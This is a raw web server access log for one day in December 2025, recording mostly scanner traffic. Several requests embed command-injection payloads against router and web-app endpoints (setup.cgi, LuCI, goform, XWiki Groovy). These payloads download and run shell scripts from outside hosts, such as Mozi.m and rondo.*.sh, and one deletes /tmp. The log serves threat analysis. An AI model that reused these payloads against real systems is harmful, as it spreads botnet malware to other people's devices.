87.121.84.181 - - [18/Dec/2025:00:26:45 +0100] "-" 400 1930 3.85.201.144 - - [18/Dec/2025:00:55:01 +0100] "GET / HTTP/1.1" 200 1895 162.243.26.217 - - [18/Dec/2025:01:21:50 +0100] "-" 400 1930 162.243.26.217 - - [18/Dec/2025:01:21:50 +0100] "-" 400 1930 162.243.26.217 - - [18/Dec/2025:01:21:50 +0100] "GET / HTTP/1.1" 200 1895 162.243.26.217 - - [18/Dec/2025:01:21:50 +0100] "GET /download/powershell/ HTTP/1.1" 404 746 162.243.26.217 - - [18/Dec/2025:01:21:50 +0100] "GET /get.php HTTP/1.1" 404 725 205.210.31.212 - - [18/Dec/2025:01:31:28 +0100] "GET / HTTP/1.0" 200 1895 64.23.251.253 - - [18/Dec/2025:02:09:50 +0100] "GET / HTTP/1.1" 200 1895 64.23.251.253 - - [18/Dec/2025:02:09:50 +0100] "GET /favicon.ico HTTP/1.1" 404 729 93.82.235.178 - - [18/Dec/2025:02:20:18 +0100] "GET / HTTP/1.0" 200 1895 65.109.159.223 - - [18/Dec/2025:02:39:36 +0100] "GET /ip HTTP/1.1" 404 720 45.154.98.124 - - [18/Dec/2025:03:21:30 +0100] "POST / HTTP/1.1" 200 1895 45.154.98.124 - - [18/Dec/2025:03:21:35 +0100] "POST / HTTP/1.1" 200 1895 45.154.98.124 - - [18/Dec/2025:03:21:35 +0100] "POST / HTTP/1.1" 200 1895 45.154.98.124 - - [18/Dec/2025:03:21:40 +0100] "POST / HTTP/1.1" 200 1895 45.154.98.124 - - [18/Dec/2025:03:21:40 +0100] "POST / HTTP/1.1" 200 1895 45.154.98.124 - - [18/Dec/2025:03:21:45 +0100] "POST / HTTP/1.1" 200 1895 45.154.98.124 - - [18/Dec/2025:03:21:45 +0100] "POST / HTTP/1.1" 200 1895 45.154.98.124 - - [18/Dec/2025:03:21:50 +0100] "POST / HTTP/1.1" 200 1895 45.156.87.74 - - [18/Dec/2025:04:22:35 +0100] "CONNECT www.cloudflare.com:443 HTTP/1.1" 400 804 65.49.1.202 - - [18/Dec/2025:04:32:38 +0100] "GET / HTTP/1.1" 200 1895 65.49.1.204 - - [18/Dec/2025:04:33:11 +0100] "GET /favicon.ico HTTP/1.1" 404 729 65.49.1.207 - - [18/Dec/2025:04:33:29 +0100] "GET /?format=json HTTP/1.1" 200 1895 65.49.1.209 - - [18/Dec/2025:04:33:42 +0100] "CONNECT www.shadowserver.org:443 HTTP/1.1" 400 804 65.49.1.202 - - [18/Dec/2025:04:33:50 +0100] "GET /geoserver/web/ HTTP/1.1" 404 740 42.230.43.20 - - [18/Dec/2025:04:57:57 +0100] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://42.230.43.20:58066/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0" 404 727 45.156.87.74 - - [18/Dec/2025:05:06:18 +0100] "CONNECT www.cloudflare.com:443 HTTP/1.1" 400 804 45.156.87.74 - - [18/Dec/2025:05:06:18 +0100] "CONNECT www.google.com:443 HTTP/1.1" 400 804 91.224.92.121 - - [18/Dec/2025:05:39:23 +0100] "OPTIONS / HTTP/1.1" 200 - 89.42.231.244 - - [18/Dec/2025:06:02:51 +0100] "GET / HTTP/1.1" 200 1895 178.20.210.137 - - [18/Dec/2025:06:46:04 +0100] "-" 400 1930 65.49.1.80 - - [18/Dec/2025:08:00:56 +0100] "-" 400 1930 85.11.183.6 - - [18/Dec/2025:08:18:37 +0100] "-" 400 1930 85.11.183.6 - - [18/Dec/2025:08:18:37 +0100] "GET / HTTP/1.1" 200 1895 172.236.228.220 - - [18/Dec/2025:09:16:20 +0100] "GET / HTTP/1.1" 200 1895 20.65.193.233 - - [18/Dec/2025:10:00:14 +0100] "GET /manager/html HTTP/1.1" 401 2499 141.98.11.140 - - [18/Dec/2025:10:12:09 +0100] "GET / HTTP/1.1" 200 1895 18.97.19.163 - - [18/Dec/2025:10:35:35 +0100] "GET / HTTP/1.1" 200 1895 198.235.24.166 - - [18/Dec/2025:10:44:38 +0100] "GET / HTTP/1.1" 200 1895 46.151.178.49 - - [18/Dec/2025:11:42:07 +0100] "GET / HTTP/1.1" 200 1895 213.209.143.52 - - [18/Dec/2025:11:54:48 +0100] "CONNECT api.ipify.org:443 HTTP/1.1" 400 804 213.209.143.52 - - [18/Dec/2025:11:54:49 +0100] "CONNECT api.ipify.org:443 HTTP/1.1" 400 804 34.79.159.68 - - [18/Dec/2025:12:29:47 +0100] "GET / HTTP/1.1" 200 1895 5.101.64.6 - - [18/Dec/2025:13:29:29 +0100] "-" 400 1930 95.215.0.144 - - [18/Dec/2025:13:30:11 +0100] "GET / HTTP/1.1" 200 1895 87.121.84.154 - - [18/Dec/2025:13:43:25 +0100] "POST / HTTP/1.1" 200 1895 87.121.84.154 - - [18/Dec/2025:13:43:31 +0100] "POST / HTTP/1.1" 200 1895 87.121.84.154 - - [18/Dec/2025:13:43:32 +0100] "POST / HTTP/1.1" 200 1895 87.121.84.154 - - [18/Dec/2025:13:43:39 +0100] "POST / HTTP/1.1" 200 1895 87.121.84.154 - - [18/Dec/2025:13:43:41 +0100] "POST / HTTP/1.1" 200 1895 87.121.84.154 - - [18/Dec/2025:13:43:48 +0100] "POST / HTTP/1.1" 200 1895 87.121.84.154 - - [18/Dec/2025:13:43:52 +0100] "POST / HTTP/1.1" 200 1895 87.121.84.154 - - [18/Dec/2025:13:44:00 +0100] "POST / HTTP/1.1" 200 1895 185.243.96.116 - - [18/Dec/2025:13:54:07 +0100] "-" 400 1930 185.243.96.116 - - [18/Dec/2025:14:01:49 +0100] "-" 400 1930 185.243.96.116 - - [18/Dec/2025:14:01:49 +0100] "-" 400 1930 192.159.99.95 - - [18/Dec/2025:14:31:50 +0100] "POST /tmUnblock.cgi HTTP/1.1" 404 731 192.159.99.95 - - [18/Dec/2025:14:31:50 +0100] "POST /goform/set_LimitClient_cfg HTTP/1.1" 404 748 192.159.99.95 - - [18/Dec/2025:14:31:50 +0100] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=%60busybox%20wget%20-qO-%20http%3A%2F%2F41.231.37.153%2Frondo.zqq.sh%7Csh%60 HTTP/1.1" 404 756 192.159.99.95 - - [18/Dec/2025:14:31:51 +0100] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=busybox%20wget%20-qO-%20http%3A%2F%2F41.231.37.153%2Frondo.ush.sh%7Csh%26&curpath=%2F¤tsetting.htm=1 HTTP/1.1" 404 727 192.159.99.95 - - [18/Dec/2025:14:31:51 +0100] "GET null HTTP/1.1" 400 1994 192.159.99.95 - - [18/Dec/2025:14:31:51 +0100] "POST /apply_sec.cgi HTTP/1.1" 404 731 192.159.99.95 - - [18/Dec/2025:14:31:51 +0100] "POST /goform/mp HTTP/1.1" 404 731 192.159.99.95 - - [18/Dec/2025:14:31:51 +0100] "GET /goform/setUsbUnload/.js?deviceName=A%3Bbusybox%20wget%20-qO-%20http%3A%2F%2F41.231.37.153%2Frondo.uzz.sh%7Csh%26echo%20 HTTP/1.0" 404 749 192.159.99.95 - - [18/Dec/2025:14:31:51 +0100] "POST /goform/setPingInfo HTTP/1.1" 404 740 192.159.99.95 - - [18/Dec/2025:14:31:51 +0100] "POST /cgi-bin/server/server.cgi?func=server02_main_submit&counter=5.22497857400916&TEST_BTN4= HTTP/1.1" 404 751 192.159.99.95 - - [18/Dec/2025:14:31:51 +0100] "POST /diagnostic.php HTTP/1.1" 404 732 192.159.99.95 - - [18/Dec/2025:14:31:51 +0100] "GET / HTTP/1.1" 200 1895 192.159.99.95 - - [18/Dec/2025:14:31:51 +0100] "GET /HNAP1/ HTTP/1.1" 404 728 192.159.99.95 - - [18/Dec/2025:14:31:51 +0100] "POST /goform/SystemCommand HTTP/1.1" 404 742 192.159.99.95 - - [18/Dec/2025:14:31:52 +0100] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 792 192.159.99.95 - - [18/Dec/2025:14:31:52 +0100] "POST /wls-wsat/CoordinatorPortType HTTP/1.1" 404 750 192.159.99.95 - - [18/Dec/2025:14:31:52 +0100] "GET /xwiki/bin/get/Main/SolrSearch?media=rss&text=%7D%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7D%5B%27sh%27%2C%20%27-c%27%2C%20%27%28wget%20-qO-%20http%3A%2F%2F41.231.37.153%2Frondo.sdu.sh%7C%7Cbusybox%20wget%20-qO-%20http%3A%2F%2F41.231.37.153%2Frondo.sdu.sh%7C%7Ccurl%20-s%20http%3A%2F%2F41.231.37.153%2Frondo.sdu.sh%29%7Csh%27%5D.execute%28%29.text%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D HTTP/1.1" 404 763 192.159.99.95 - - [18/Dec/2025:14:31:52 +0100] "GET /?doAs=%60%28wget%20-qO-%20http%3A%2F%2F41.231.37.153%2Frondo.pms.sh%7C%7Cbusybox%20wget%20-qO-%20http%3A%2F%2F41.231.37.153%2Frondo.pms.sh%7C%7Ccurl%20-s%20http%3A%2F%2F41.231.37.153%2Frondo.pms.sh%29%7Csh%60 HTTP/1.1" 200 1895 192.159.99.95 - - [18/Dec/2025:14:31:52 +0100] "GET /cgi-bin/jarrewrite.sh HTTP/1.1" 404 743 192.159.99.95 - - [18/Dec/2025:14:31:52 +0100] "POST /goform/formJsonAjaxReq HTTP/1.1" 404 744 206.168.34.46 - - [18/Dec/2025:16:06:57 +0100] "-" 400 1930 206.168.34.46 - - [18/Dec/2025:16:06:58 +0100] "GET / HTTP/1.1" 200 1895 206.168.34.46 - - [18/Dec/2025:16:07:04 +0100] "GET /favicon.ico HTTP/1.1" 404 729 206.168.34.46 - - [18/Dec/2025:16:08:03 +0100] "-" 400 1930 206.168.34.46 - - [18/Dec/2025:16:08:04 +0100] "GET /sitemap.xml HTTP/1.1" 404 729 79.35.192.191 - - [18/Dec/2025:17:45:29 +0100] "GET / HTTP/1.1" 200 1895 206.189.178.58 - - [18/Dec/2025:19:06:23 +0100] "GET / HTTP/1.1" 200 1895 45.38.44.221 - - [18/Dec/2025:19:12:36 +0100] "GET /login HTTP/1.1" 404 723 8.211.52.151 - - [18/Dec/2025:19:24:07 +0100] "GET / HTTP/1.1" 200 1895 141.98.82.26 - - [18/Dec/2025:19:24:27 +0100] "GET /js/zimbraMail/share/model/ZmSettings.js HTTP/1.1" 404 773 45.135.193.9 - - [18/Dec/2025:19:58:44 +0100] "GET /json/ HTTP/1.1" 404 727 45.154.98.124 - - [18/Dec/2025:20:11:30 +0100] "POST / HTTP/1.1" 200 1895 45.154.98.124 - - [18/Dec/2025:20:11:35 +0100] "POST / HTTP/1.1" 200 1895 45.154.98.124 - - [18/Dec/2025:20:11:35 +0100] "POST / HTTP/1.1" 200 1895 45.154.98.124 - - [18/Dec/2025:20:11:40 +0100] "POST / HTTP/1.1" 200 1895 45.154.98.124 - - [18/Dec/2025:20:11:40 +0100] "POST / HTTP/1.1" 200 1895 45.154.98.124 - - [18/Dec/2025:20:11:45 +0100] "POST / HTTP/1.1" 200 1895 45.154.98.124 - - [18/Dec/2025:20:11:45 +0100] "POST / HTTP/1.1" 200 1895 45.154.98.124 - - [18/Dec/2025:20:11:50 +0100] "POST / HTTP/1.1" 200 1895 123.58.207.151 - - [18/Dec/2025:20:15:39 +0100] "-" 400 1930 123.58.207.151 - - [18/Dec/2025:20:15:49 +0100] "GET / HTTP/1.1" 200 1895 123.58.207.151 - - [18/Dec/2025:20:16:07 +0100] "GET /favicon.ico HTTP/1.1" 404 729 123.58.207.151 - - [18/Dec/2025:20:16:07 +0100] "GET /robots.txt HTTP/1.1" 404 728 123.58.207.151 - - [18/Dec/2025:20:16:07 +0100] "GET /sitemap.xml HTTP/1.1" 404 729 123.58.207.151 - - [18/Dec/2025:20:16:08 +0100] "GET /config.json HTTP/1.1" 404 729 45.38.44.221 - - [18/Dec/2025:20:45:56 +0100] "POST /goform/set_LimitClient_cfg HTTP/1.1" 404 748 91.224.92.121 - - [18/Dec/2025:21:20:37 +0100] "OPTIONS / HTTP/1.1" 200 - 89.42.231.244 - - [18/Dec/2025:21:20:47 +0100] "GET /SDK/webLanguage HTTP/1.1" 404 737 87.121.84.180 - - [18/Dec/2025:21:42:10 +0100] "GET /ip HTTP/1.1" 404 720 147.182.179.56 - - [18/Dec/2025:21:51:02 +0100] "GET /.git/config HTTP/1.1" 404 733 85.11.183.6 - - [18/Dec/2025:22:01:36 +0100] "-" 400 1930 85.11.183.6 - - [18/Dec/2025:22:01:36 +0100] "GET / HTTP/1.1" 200 1895 87.251.75.163 - - [18/Dec/2025:22:07:33 +0100] "-" 400 1930 167.172.154.45 - - [18/Dec/2025:22:11:44 +0100] "GET /.git/config HTTP/1.1" 404 733 45.38.44.221 - - [18/Dec/2025:22:26:37 +0100] "GET /login HTTP/1.1" 404 723 206.189.192.226 - - [18/Dec/2025:22:36:10 +0100] "-" 400 1930 206.189.192.226 - - [18/Dec/2025:22:36:11 +0100] "-" 400 1930 206.189.192.226 - - [18/Dec/2025:22:36:11 +0100] "GET / HTTP/1.1" 200 1895 206.189.192.226 - - [18/Dec/2025:22:36:11 +0100] "GET /download/powershell/ HTTP/1.1" 404 746 206.189.192.226 - - [18/Dec/2025:22:36:11 +0100] "GET /get.php HTTP/1.1" 404 725 94.154.35.122 - - [18/Dec/2025:22:47:06 +0100] "-" 400 1930 141.98.11.140 - - [18/Dec/2025:23:00:19 +0100] "GET /cgi-bin/config_mirror.exp HTTP/1.1" 404 747 116.178.129.78 - - [18/Dec/2025:23:02:20 +0100] "GET / HTTP/1.1" 200 1895 1.83.125.130 - - [18/Dec/2025:23:03:11 +0100] "GET / HTTP/1.1" 200 1895 1.83.125.78 - - [18/Dec/2025:23:04:16 +0100] "GET / HTTP/1.1" 200 1895 116.178.130.202 - - [18/Dec/2025:23:05:15 +0100] "GET / HTTP/1.1" 200 1895 183.185.21.57 - - [18/Dec/2025:23:05:16 +0100] "GET /favicon.ico HTTP/1.1" 404 729 178.219.174.253 - - [18/Dec/2025:23:25:49 +0100] "GET / HTTP/1.1" 200 1895 20.65.194.161 - - [18/Dec/2025:23:28:21 +0100] "GET / HTTP/1.1" 200 1895 20.65.194.161 - - [18/Dec/2025:23:28:22 +0100] "-" 400 1930 77.48.26.213 - - [18/Dec/2025:23:46:04 +0100] "GET / HTTP/1.0" 200 1895 45.135.193.9 - - [18/Dec/2025:23:51:20 +0100] "GET /json/ HTTP/1.1" 404 727 45.38.44.221 - - [18/Dec/2025:23:55:51 +0100] "POST /goform/set_LimitClient_cfg HTTP/1.1" 404 748